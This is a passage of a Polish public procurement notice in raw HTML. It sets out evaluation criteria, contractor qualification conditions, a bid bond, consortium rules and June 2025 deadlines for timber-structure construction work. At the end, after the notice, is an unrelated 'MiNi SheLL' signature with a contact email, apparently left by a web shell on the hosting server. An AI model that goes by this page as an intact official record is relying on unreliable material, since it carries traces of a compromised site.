class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowania Zamawiający wymaga, aby Wykonawca posiadał:<br/><br/>1)	Zdolność do występowania w obrocie gospodarczym:<br/>odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej o ile podmiot ubiegający się o zamówienie publiczne prowadzi działalność gospodarczą. O zamówienie publiczne mogą również ubiegać się osoby fizyczne, które nie prowadzą działalności gospodarczej, a więc nie posiadają wpisu ani do KRS, ani do CEIDG.<br/>2)	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/> Zamawiający nie stawia wymagań w tym zakresie.<br/><br/>3)	Sytuacja ekonomiczna i finansowa: <br/>Zamawiający wymaga, aby Wykonawca posiadał<br/>a)	środki finansowe lub zdolność kredytową w wysokości min. 100 000,00 zł,<br/>b)	ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę gwarancyjną ubezpieczenia min. 100 000,00 zł. <br/><br/>4)	Zdolność techniczna lub zawodowa:<br/><br/>a)	doświadczenie Wykonawcy: <br/>Wykonawca powinien wykazać, że w ciągu ostatnich 5 lat, przed terminem składania ofert, a jeśli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał i/lub wykonuje należycie i zgodnie z przepisami prawa budowlanego oraz prawidłowo ukończył co najmniej:<br/>•	2 roboty budowlane polegające na budowie, konstrukcji z drewna klejonego o łącznej wartości wykonanych robót nie mniejszej niż 100 000,00 zł brutto.<br/>W przypadku robót wykonywanych/będących w trakcie realizacji na doświadczenie, których Wykonawca się powołuje, Zamawiający uzna warunek za spełniony, jeżeli część wykonywanego zamówienia zakresem ilościowym spełni wymogi przedmiotu zamówienia, a Wykonawca przedstawi dowód, iż realizuje zamówienie należycie.<br/><br/>b)	dysponowania osobami: <br/>Wykonawca potwierdzi spełnianie niniejszego warunku udziału w postępowaniu, jeżeli wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia w tym zamówienia publicznego w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowania robotami budowlanymi co najmniej:<br/>•	min. 1 osobę (kierownik budowy) posiadającą uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń, oraz doświadczenie w kierowaniu robotami budowlanymi tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, kierował minimum 1 robotą polegającą na budowie konstrukcji z drewna klejonego o łącznej wartości wykonanych robót nie mniejszej niż 100 000,00 zł brutto, która została zakończona*.<br/>*Za zakończone roboty Zamawiający rozumie roboty, które zostały zrealizowane na rzecz podmiotu (Zamawiającego/ Odbiorcy) w ramach danej umowy i odebrane przez ten podmiot, jako wykonane należycie. Zamawiający zastrzega sobie prawo do ewentualnego sprawdzenia prawdziwości przedstawianych danych, które będą wyszczególnione w ofercie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W przypadku podmiotów ubiegających się o zamówienie publiczne prowadzących działalność gospodarczą lub zawodową:<br/>1)	krajowych:<br/>Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej o ile podmiot ubiegający się o zamówienie publiczne prowadzi działalność gospodarczą lub zawodową;<br/>2)	zagranicznych:<br/>dokument potwierdzający, że jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, <br/>wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem.<br/>Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem<br/>Dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z Przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia<br/>Wykaz wykonanych robót potwierdzający opisany warunek wraz z dowodami potwierdzającymi należyte wykonanie tych robót - z wykorzystaniem załącznika nr 4 do SWZ.<br/>Do każdej pozycji wykazu należy załączyć dowody określające, czy wskazane roboty budowalne te zostały wykonane w sposób należyty.<br/>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego skierowanych przez Wykonawcę – z wykorzystaniem Załącznika nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Oświadczenie podmiotu o udostępnieniu zasobów wskazujące na okoliczności opisane w rozdziale VII ust. 2 SWZ oraz<br/>oświadczenia podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>odpowiednio spełnianie warunków udziału w postępowaniu, o których mowa w Rozdziale VII ust. 1 – jeżeli wykonawca<br/>składający ofertę polega na zasobach innych podmiotów;<br/>2) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika jaki zakres rzeczowy<br/>wykonania zamówienia realizować zamierzają poszczególni Wykonawcy;<br/>3) Pełnomocnictwo w formie oryginału lub notarialnie poświadczonej kopii do reprezentowania wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać<br/>przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu<br/>albo do reprezentowania w postępowaniu i zawarcia umowy;<br/>4) Pełnomocnictwo lub inne dokumenty, z których wynika prawo do podpisania oferty (oryginał lub kopia potwierdzona „za<br/>zgodność z oryginałem” przez notariusza) oraz do podpisania innych dokumentów składanych wraz z ofertą, chyba, że<br/>Zamawiający może je uzyskać w szczególności za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności<br/>rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne (tj. Dz. U z 2020, poz. 346), a Wykonawca wskazał to wraz ze złożeniem oferty, o ile prawo do ich<br/>podpisania nie wynika z dokumentów złożonych wraz z ofertą;<br/>5) Oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz, bądź kopię dokumentu,<br/>potwierdzającego wniesienie wadium w pieniądzu potwierdzoną za zgodność z oryginałem (jeśli dotyczy).<br/>6. Szczegółowy kosztorys ofertowy z podanymi cenami jednostkowymi z tabelą elementów scalonych opracowany przez<br/>Wykonawcę na podstawie przedmiaru oraz dokumentacji postępowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Przystępując do przetargu Wykonawca zobowiązany jest w terminie do składania ofert wnieść wadium: 4 000,00 zł. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze (konsorcja/spółki cywilne) oferta<br/>musi spełniać wymagania określone w art. 58 ustawy Prawo zamówień publicznych.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ustanawiają Pełnomocnika do reprezentowania<br/>ich w niniejszym postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo powinno być załączone do oferty celu ustalenia podmiotu uprawnionego do występowania w imieniu<br/>Wykonawców w sposób umożliwiający ich identyfikację.<br/>3. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika jaki<br/>zakres rzeczowy zamówienia realizować zamierzają poszczególni Wykonawcy.<br/>5. W celu wykazania niepodlegania wykluczeniu z postępowania o udzielenie zamówienia, o którym mowa w rozdziale VI<br/>wymagane jest załączenie do oferty oświadczenia i przedłożenia na wezwanie dokumentów dla każdego konsorcjanta<br/>oddzielnie.<br/>6. Zamawiający w stosunku do Wykonawców wspólnie ubiegających się o zamówienie, w odniesieniu do warunku<br/>dotyczącego:<br/>1) sytuacji ekonomicznej – musi spełniać w całości przynajmniej jeden z Wykonawców;<br/>2) sytuacji finansowej - dopuszcza łączne spełnienie warunku przez Wykonawców;<br/>3) zdolności dot. doświadczenia Wykonawcy – musi spełniać w całości przynajmniej jeden z Wykonawców;<br/>4) zdolności technicznej (personel, sprzęt) - dopuszcza łączne spełnienie warunku przez Wykonawców.<br/>7. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, warunek<br/>udziału jest spełniony, jeżeli Wykonawca, ubiegający się o zamówienie wspólnie z innymi wykonawcami, i który dostarcza<br/>potencjał na potrzeby spełnienia warunku udziału w postępowaniu w zakresie wykształcenia, kwalifikacji zawodowych lub doświadczenia, ma obowiązek osobiście wykonać tę część zamówienia (kluczowy zakres), dla której te zdolności są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zmiany postanowień zawartej z Wykonawcą umowy oraz ich warunki określił w &#34;Projekcie umowy&#34; stanowiącym Załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-16 12:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-16 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com